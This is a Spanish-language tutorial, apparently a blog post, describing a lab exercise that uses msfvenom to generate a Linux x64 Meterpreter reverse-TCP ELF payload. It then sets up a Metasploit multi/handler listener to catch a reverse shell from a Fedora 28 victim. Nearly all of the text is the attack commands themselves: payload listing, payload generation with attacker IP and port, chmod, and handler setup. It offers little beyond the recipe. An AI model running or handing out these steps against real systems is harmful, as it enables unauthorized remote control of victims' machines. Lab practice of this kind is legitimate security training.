En esta entrada se realizara una practica para poder generar nuestros propios Payload con tal de conseguir un Reverse Shell de un sistemas con distribución Linux sin la necesidad de codificar absolutamente nada.
Para llevar acabo la practica he realizado el escenario en una red local y he utilizado dos equipos, el primer equipo es una distribución con Kali Linux que sera la maquina atacante y es donde viene lo necesario para realizar la explotación de un sistema Linux y la segunda maquina es Fedora 28 que sera el equipo victima del cual conseguiremos un reverse shell.
En Kali Linux empezaremos abriendo una terminal y buscando los payload’s disponibles para Linux con arquitectura de 64 bits.
# msfvenom -l | grep "linux/x64"
La linea seleccionada en la imagen anterior es el payload que utilizaremos, seguido estaremos generando dicho payload agregando los siguientes parámetros:
-p
: Especifica que payload se utilizara.lhost
: La IP de la maquina atacante.lport
: El puerto de la maquina atacante.-f
: El formato de salida.-o
: La asignación de nombre del payload.
# msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.1.222 lport=1234 -f elf -o origen_shell
El payload generado esta en el home de nuestro usuario root, daremos permisos de ejecución con la siguiente linea:
# chmod +x origen_shell
Ya esta listo para ser ejecutado en el equipo victima pero para dar paso a la post-explotación abriremos Metasploit y utilizaremos Meterpreter, usando en siguiente modulo.
> use exploit/multi/handler
Indicamos que payload se escogió de antemano para la explotación y asignamos la IP y el puerto del atacante.
> set payload linux/x64/meterpreter_reverse_tcp > set lhost 192.168.1.222 > set lport 1234
Ahora nos mantendremos a la espera de que sea ejecutado nuestro payload.
> exploit
La victima habiendo ejecutado el payload generado por nosotros se crea exitosamente una sesión de meterpreter, podemos realizar algunos análisis del sistema para verificar que distribución tiene, de antemano se dijo que se realizaría desde un equipo con Fedora y como observamos en la imagen de abajo se ve claramente que es Fedora 28.
Verificamos en la maquina victima que el payload tiene una conexión establecida exitosa y ademas se tiene otros dos procesos ejecutándose en el equipo atacado.
Referencias: